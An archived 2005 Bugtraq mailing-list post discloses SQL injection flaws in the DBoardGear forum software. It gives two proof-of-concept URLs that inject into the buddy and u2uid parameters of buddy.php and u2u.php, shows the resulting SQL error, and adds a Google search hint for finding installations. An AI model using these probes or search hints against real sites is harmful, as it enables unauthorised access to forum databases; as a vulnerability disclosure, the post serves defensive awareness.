[40846] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

DBoardGear SQL Injection

daemon@ATHENA.MIT.EDU (almaster@hotmail.com)
Mon Oct 24 12:43:40 2005

Date: 24 Oct 2005 13:49:32 -0000
Message-ID: <20051024134932.21670.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: almaster@hotmail.com
To: bugtraq@securityfocus.com

DboardGear ..
Search By Google :-
by DboardGear

Gr33tz :-
         aLMaSTeR HaCKeR .. SQL Injection's FOunder   - | almaster@hotmail.com|-
         Security4Arab .. A'Where Home .. 

1- SQL Injection in buddy.php
http://www.site.com/dboard/buddy.php?action=add&buddy=|aLMaSTeR

2-SQL Injection in u2a.php
http://www.site.com/dboard/u2u.php?action=view&u2uid=|aLMaSTeR

Error:
You have an error in your SQL syntax near '' at line 1


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[40846] in bugtraq

DBoardGear SQL Injection

daemon@ATHENA.MIT.EDU (almaster@hotmail.com)Mon Oct 24 12:43:40 2005

daemon@ATHENA.MIT.EDU (almaster@hotmail.com)
Mon Oct 24 12:43:40 2005